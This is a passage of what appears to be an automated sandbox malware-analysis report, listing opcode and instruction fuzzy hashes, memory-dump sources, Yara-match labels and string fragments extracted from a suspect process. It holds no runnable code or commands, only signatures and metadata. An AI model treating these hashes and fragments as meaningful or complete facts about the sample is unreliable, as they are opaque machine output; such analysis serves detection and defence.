                                                                                                                            • Opcode ID: cf6ed1507c048202a8380901b20853abf16bc6de9ff7b6f9047b8a115ef48fb3
                                                                                                                            • Instruction ID: 1aef836bf39423618528e1fd70212b425a8347a51a9f8a1967541ab63d9ecdd5
                                                                                                                            • Opcode Fuzzy Hash: cf6ed1507c048202a8380901b20853abf16bc6de9ff7b6f9047b8a115ef48fb3
                                                                                                                            • Instruction Fuzzy Hash: 343127B5A00608AFDB10DFA9C840EEFB7F9EF88700F108619F918A7340D774A951CBA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5d70121d21914185a18db6d01ed80ca7d508067f521cbbc7796229021d8daec4
                                                                                                                            • Instruction ID: 14e29c260ebf584604869add9eb6519d1ff24b3ad8ccd5a2b8e3ad379762fddd
                                                                                                                            • Opcode Fuzzy Hash: 5d70121d21914185a18db6d01ed80ca7d508067f521cbbc7796229021d8daec4
                                                                                                                            • Instruction Fuzzy Hash: 5E214AB5A10709ABDB50DF68DC41EEFB7B8EF88700F10451DF9189B281DBB4A951CBA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 25b18df5678153bc5923fa7573696ab297a4478d8ab3a4e71ffa8f91d7ab67c5
                                                                                                                            • Instruction ID: 6ae4e85e8b2ddc1c893302a100b4ab68e76378c3dbc116f8405b0dbcff3f3528
                                                                                                                            • Opcode Fuzzy Hash: 25b18df5678153bc5923fa7573696ab297a4478d8ab3a4e71ffa8f91d7ab67c5
                                                                                                                            • Instruction Fuzzy Hash: 0D11A3763803057BF720EE198C42FAB775C9B84F20F244015FB14AE2C1D6E5F88246B8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 46a6bf4ad95f33546e795f44d6ff258994b1487d7f7f38bc391b9097c11bbe26
                                                                                                                            • Instruction ID: 9665e3c7f0cbf20be517d6dcfd777c5787103603e98e690877bf1eaa3e41c77d
                                                                                                                            • Opcode Fuzzy Hash: 46a6bf4ad95f33546e795f44d6ff258994b1487d7f7f38bc391b9097c11bbe26
                                                                                                                            • Instruction Fuzzy Hash: 66119075511719ABE720EF68CC41FEBB3ACEB85700F10461EF9189B281DBB56941CBA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8cf869b84da2e677cde3e514bf77ca522b6e9b483428207a7ca8a5e1cae373bf
                                                                                                                            • Instruction ID: afde3450aeb8a92009e7b7236c8e471f31218f095eaa0706c111077607761862
                                                                                                                            • Opcode Fuzzy Hash: 8cf869b84da2e677cde3e514bf77ca522b6e9b483428207a7ca8a5e1cae373bf
                                                                                                                            • Instruction Fuzzy Hash: 3611B275611715ABE720EF68CC41FAFB3ACEF84700F10461DF9189B281DBB56941CBA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                                                                                            • Instruction ID: bf1cb564d3d1b454656e8b9edeb432966c7d64033fb87d740143e966d9b8cda6
                                                                                                                            • Opcode Fuzzy Hash: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                                                                                            • Instruction Fuzzy Hash: F701AEB6210608BBCB44DE9DDC80EDB77ADAB8C710F008208BA19A7241D670F8518BA4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 411207d8587c24a395348c70979ae5aa345640031a6cae91881f5f34d0dd53fd
                                                                                                                            • Instruction ID: 738333d6e3d03a75d8b8dd6c7407180eafd9b6358b4719d48fbf3a548ab6c113
                                                                                                                            • Opcode Fuzzy Hash: 411207d8587c24a395348c70979ae5aa345640031a6cae91881f5f34d0dd53fd
                                                                                                                            • Instruction Fuzzy Hash: D1F0BB7351521767D710AF5DBC40B96F79CEB95330F240226F95C8B282D772D4918390
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 25ecb6bf2a448980e5a57064e2dd1879b49d137cb7a586a0f03e4685d1d0a6e8
                                                                                                                            • Instruction ID: 7b2623a9836c1d1d76e91e3e8137c63eeae6797ccf57ffaed64f6db0834472ee
                                                                                                                            • Opcode Fuzzy Hash: 25ecb6bf2a448980e5a57064e2dd1879b49d137cb7a586a0f03e4685d1d0a6e8
                                                                                                                            • Instruction Fuzzy Hash: BAF0F675C243086EEF10EFE9CC45EAE7378DFD4720F008389E8089A180F67089958B5A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4691c96d8d81143b437ca4f97799bd03263fa4e70748146f5b0961e75674bf37
                                                                                                                            • Instruction ID: d277fa445831aeac3e511a51fbd063c82129f9c14928a2c5c3f2dac571021320
                                                                                                                            • Opcode Fuzzy Hash: 4691c96d8d81143b437ca4f97799bd03263fa4e70748146f5b0961e75674bf37
                                                                                                                            • Instruction Fuzzy Hash: 87F01C76214604BBDB10EFA9DC41E9B77ACEFC8750F008509FA18A7241D770BD158BB4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: be98c509030c2ea581b490eed3ebf59809605963665b9a2a60d9c613e3bd7c53
                                                                                                                            • Instruction ID: 41b9896c0db318dd407544620724b8e3a649f107452136ba2c72d5b39ee0657c
                                                                                                                            • Opcode Fuzzy Hash: be98c509030c2ea581b490eed3ebf59809605963665b9a2a60d9c613e3bd7c53
                                                                                                                            • Instruction Fuzzy Hash: E8F05E71815209EBDB14CF64D841BDEBBB8EB04720F1043AEE8259B280E63597908781
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                                                                            • Instruction ID: 039cc87bd1bc53f9556ff421f5fe8e677204f32725576127ebff23bd73c2f36c
                                                                                                                            • Opcode Fuzzy Hash: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                                                                            • Instruction Fuzzy Hash: 98E06D76204304BBD714EE58DC40EAB77ACEFC8750F004409F908A7281D670BD10C7B4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 473c746b910a85d1364797c5b8ce6b0ed0b6d8d67083c2f15317aaf68b8c99ac
                                                                                                                            • Instruction ID: 707431f36f7cf6ae204cb4018d1ecf262810630cd406b54d378fb7761b43be63
                                                                                                                            • Opcode Fuzzy Hash: 473c746b910a85d1364797c5b8ce6b0ed0b6d8d67083c2f15317aaf68b8c99ac
                                                                                                                            • Instruction Fuzzy Hash: 17E0DF36A51A2027C220D68D9C05FABB39CCBD9F60F0D00A9FE18AB200E5A4A94186E4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 186e6c7721f9e7ab4cb97c2fe40417233b977bf3aeaacd3eae27a4da6970f6de
                                                                                                                            • Instruction ID: d93bec4cb8cf06d3b71500107fa15aa7ae75603602a9ece9dfe5003545e2a753
                                                                                                                            • Opcode Fuzzy Hash: 186e6c7721f9e7ab4cb97c2fe40417233b977bf3aeaacd3eae27a4da6970f6de
                                                                                                                            • Instruction Fuzzy Hash: 2AE06571925109EBDF08CF64D844A9DB7A8EF04720F1447AEE816CB240D33587D08740
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                                                                                            • Instruction ID: b094c72dbd60bdbffe80f6800f8a1d6499f90c1cc03adf5095dbe31e170a266b
                                                                                                                            • Opcode Fuzzy Hash: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                                                                                            • Instruction Fuzzy Hash: B5E08636210714BBD210FB69DC41FD7776CDFC5710F004515FA086B242C6B1791087B0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0d1891f71d0e7e7beeecc60b7cf962617c7017355451182c39435ae05dc19811
                                                                                                                            • Instruction ID: 25daebef0241b0825768381a6b1f4ed7fee9843f0ff4bfd66a502d6a7181aac1
                                                                                                                            • Opcode Fuzzy Hash: 0d1891f71d0e7e7beeecc60b7cf962617c7017355451182c39435ae05dc19811
                                                                                                                            • Instruction Fuzzy Hash: 21C02BD91386C2924F22FB7412D09EF2F2384233043381AC0ECC69C347C6D0C58D414E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                                            • API String ID: 0-1002149817
                                                                                                                            • Opcode ID: ce336ed1213236cd1af306e2b9385ac0025bfbbd7f3c3f5c4b04c9987333ccc7
                                                                                                                            • Instruction ID: 1229f81b371581388ed9f3a1902a7b99d7891e704bd726006913ffff55b92980
                                                                                                                            • Opcode Fuzzy Hash: ce336ed1213236cd1af306e2b9385ac0025bfbbd7f3c3f5c4b04c9987333ccc7
                                                                                                                            • Instruction Fuzzy Hash: E4C11CB5D11328AFDB21DFA4CC44BEEBBB9AF45304F008199D548AB241E7B55A888F61
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $=$($8^$=$L7$O5$Z$[$[$]$d&$fX$k^$q$y$}$4
                                                                                                                            • API String ID: 0-2955521445
                                                                                                                            • Opcode ID: 47d7064b2cb0d4fcb1e2eb3ebe04258ed3658283261e7028a725b8c347881e73
                                                                                                                            • Instruction ID: 936818dab7a3751c60bf3890a0c01c4ab718a1892efa95f1a3ddbcd87892e44c
                                                                                                                            • Opcode Fuzzy Hash: 47d7064b2cb0d4fcb1e2eb3ebe04258ed3658283261e7028a725b8c347881e73
                                                                                                                            • Instruction Fuzzy Hash: 3A514AB0C0566DCBFB24CF85C958BDEBAB5BB01309F108599C1593B281D7BA1A89CF91
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $=$($8^$=$L7$O5$Z$[$[$]$d&$fX$k^$q$y$}$4
                                                                                                                            • API String ID: 0-2955521445
                                                                                                                            • Opcode ID: ca97639d4458337b64d935f13032dd5b05b925360a0538211b0dd1fd3e333736
                                                                                                                            • Instruction ID: b6ff94d262f1c6322626e175f5fe3a58463387b5f789aac3d4fdd7bd7da3d7cf
                                                                                                                            • Opcode Fuzzy Hash: ca97639d4458337b64d935f13032dd5b05b925360a0538211b0dd1fd3e333736
                                                                                                                            • Instruction Fuzzy Hash: FD514AB0C05669CBFB24CF85C958BDEBAB5BB01309F108599C1593B281D7BA1A89CF91
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                                            • API String ID: 0-392141074
                                                                                                                            • Opcode ID: 0639b8236867b4e50c510351713e476aa8decf5e313ddfec55fef868a5996a94
                                                                                                                            • Instruction ID: fe9c084aad879d86e364d413591ebff6f51b9ad66e4116ca29907b88c2bdb5bd
                                                                                                                            • Opcode Fuzzy Hash: 0639b8236867b4e50c510351713e476aa8decf5e313ddfec55fef868a5996a94
                                                                                                                            • Instruction Fuzzy Hash: 82711DB5C10728ABDB15DBA4CC41FEEB77CBF48700F04859DE519AA140E7B55B888FA1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                                            • API String ID: 0-392141074
                                                                                                                            • Opcode ID: 2349bba77284b97750d77158597ca85cbb2965ceb710e289a4c2be163f9d0ca9
                                                                                                                            • Instruction ID: fdc7847cd2eab6cf07bc1aa77137243937169cb6da358376031ebc5ae7f8b4f4
                                                                                                                            • Opcode Fuzzy Hash: 2349bba77284b97750d77158597ca85cbb2965ceb710e289a4c2be163f9d0ca9
                                                                                                                            • Instruction Fuzzy Hash: 1D611BB5C10728ABEB25DBA4CC41FEEB77CBF48700F04859DE519AA140E7B55B888F61
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: "#CO$@Z\X$A\YO$A^[^$G$';$G7^^$ZA_A$ZA_O$Z\XA$Z\XA\Y$\Y$^V^Y$o
                                                                                                                            • API String ID: 0-1090279348
                                                                                                                            • Opcode ID: bcd071c43341f0b16623e491c83721323b743e5ce182ae81e6e774fcb8420ee1
                                                                                                                            • Instruction ID: fe2bc11943b16316be9263dd9d39e3a454656d7ef448cb59345f013cc967aeb6
                                                                                                                            • Opcode Fuzzy Hash: bcd071c43341f0b16623e491c83721323b743e5ce182ae81e6e774fcb8420ee1
                                                                                                                            • Instruction Fuzzy Hash: B821F8B0C01388AACB00DFE1E999ACDBBB4FB14704F208598D9697B201C3794A5A8F85
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                                            • API String ID: 0-685823316
                                                                                                                            • Opcode ID: 13c0f166920ac541ee47a58fac03eceaae2673d556e2d8852e67614461d8d907
                                                                                                                            • Instruction ID: 8e2fdc350f039a25b2434761487646c4b9628778fd50978cc92e4defdcd2fea6
                                                                                                                            • Opcode Fuzzy Hash: 13c0f166920ac541ee47a58fac03eceaae2673d556e2d8852e67614461d8d907
                                                                                                                            • Instruction Fuzzy Hash: 043181B5D51318ABEF40DFE4CC45BEEBBB9AF04704F00815CE618BA180DBB556488FA5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .$P$e$i$m$o$r$x
                                                                                                                            • API String ID: 0-620024284
                                                                                                                            • Opcode ID: 479994489971b5be046ffe758a185202d1abf4df93a57e4d86fadde2066cee02
                                                                                                                            • Instruction ID: ae6badab715da079f3c313c04173a67b1bf6e397647c5da6e80921a90b9848b6
                                                                                                                            • Opcode Fuzzy Hash: 479994489971b5be046ffe758a185202d1abf4df93a57e4d86fadde2066cee02
                                                                                                                            • Instruction Fuzzy Hash: 444188B5810324ABEB11EFA4DC45FDE737CAF54700F408599A509AB140EBF55B898FA0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: F$P$T$f$r$x
                                                                                                                            • API String ID: 0-2523166886
                                                                                                                            • Opcode ID: d5da863da871569713ec86c9c529306df59569723dc397e6a3af80081ccbe3be
                                                                                                                            • Instruction ID: 2de2bea6bb32e210bbed06ae1ba837f0af617472ece467dc0df4a1900bea8f3d
                                                                                                                            • Opcode Fuzzy Hash: d5da863da871569713ec86c9c529306df59569723dc397e6a3af80081ccbe3be
                                                                                                                            • Instruction Fuzzy Hash: 3151E471910715ABEB34DF68CC44BABF7B8EF04740F04455EE5499A181E7B4A6C8CFA1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: C$Z$[$`$f$p
                                                                                                                            • API String ID: 0-518084781
                                                                                                                            • Opcode ID: ce34b63da57df3aa10a4e5694d9c1efd90943e76aa992db27115448b1e3b0fe3
                                                                                                                            • Instruction ID: 472d40dbd6a27b0d2acdb4340ab931600e53a179f6ad77dc129429d2042fdbd1
                                                                                                                            • Opcode Fuzzy Hash: ce34b63da57df3aa10a4e5694d9c1efd90943e76aa992db27115448b1e3b0fe3
                                                                                                                            • Instruction Fuzzy Hash: 14110B20D183CED9DB12DBBC88042AEBF715F23224F0883C9D4A52B2D2D2794756C7A2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $i$l$o$u
                                                                                                                            • API String ID: 0-2051669658
                                                                                                                            • Opcode ID: b4ea47b01b7898c9864b84b28d9626ce08109d28a33f87d693356b7b357a4a3e
                                                                                                                            • Instruction ID: bfb959e88fec16b6827dc0c46a7ed81f84e0167204b1716f832cd1f84817dd96
                                                                                                                            • Opcode Fuzzy Hash: b4ea47b01b7898c9864b84b28d9626ce08109d28a33f87d693356b7b357a4a3e
                                                                                                                            • Instruction Fuzzy Hash: A6616EB6910305AFDF24DBA4DC80FEFB7FCAB48700F144659E519A7240EB75AA85CB60
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $i$l$o$u
                                                                                                                            • API String ID: 0-2051669658
                                                                                                                            • Opcode ID: 36537f18c4d30511c3cd47f03d1f00fa0f5c4f450a841692cd7a64695cecaf30
                                                                                                                            • Instruction ID: 434c50c7387b52439480052655afa8376b7229a26f372d810adfddbafda3a247
                                                                                                                            • Opcode Fuzzy Hash: 36537f18c4d30511c3cd47f03d1f00fa0f5c4f450a841692cd7a64695cecaf30
                                                                                                                            • Instruction Fuzzy Hash: 1B413CB5910309AFDB20DFA8DC84FEFBBFDAB48700F104559E559A7240D771AA81CB60
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $e$k$o
                                                                                                                            • API String ID: 0-3624523832
                                                                                                                            • Opcode ID: 7ed2013f33c7443f5a17a214e74812ffc78b8b754efadb3e995bc0177c4c79b3
                                                                                                                            • Instruction ID: 32a69fc084291f0dc56c40e68f0a2d9ff9adb7c7772ea6278c4879e926153281
                                                                                                                            • Opcode Fuzzy Hash: 7ed2013f33c7443f5a17a214e74812ffc78b8b754efadb3e995bc0177c4c79b3
                                                                                                                            • Instruction Fuzzy Hash: CFB13BB5A00709AFDB24DBA8DC85FEFB7FDAF88700F148559F619A7240D670AA41CB50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $e$h$o
                                                                                                                            • API String ID: 0-3662636641
                                                                                                                            • Opcode ID: b86888f39945026197ae74827de75efca9d8e2664e076802944b34d9c2a88cf6
                                                                                                                            • Instruction ID: 238a23ebc9abb287eec72c93257612e0db66510eb0fb2f501047884be3c42c50
                                                                                                                            • Opcode Fuzzy Hash: b86888f39945026197ae74827de75efca9d8e2664e076802944b34d9c2a88cf6
                                                                                                                            • Instruction Fuzzy Hash: 8A8176B68112186BEB15EB94DC85FFE737CFF48700F44859AE509A6140EBB45BC58FA0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                                            • API String ID: 0-2877786613
                                                                                                                            • Opcode ID: a8b5422b31cd4b648513d401d266d71b23f75cae4631e7807b02f145d2f085b1
                                                                                                                            • Instruction ID: 8a85f8c83aaffdba786d70a08cdf108730dc67be2a638e95b5f50457ae49251c
                                                                                                                            • Opcode Fuzzy Hash: a8b5422b31cd4b648513d401d266d71b23f75cae4631e7807b02f145d2f085b1
                                                                                                                            • Instruction Fuzzy Hash: 5C41A275961A297FEB01EB94CC02FFF773CAF55700F408049F614AB281E7B46A418BA6
                                                                                                                            Strings
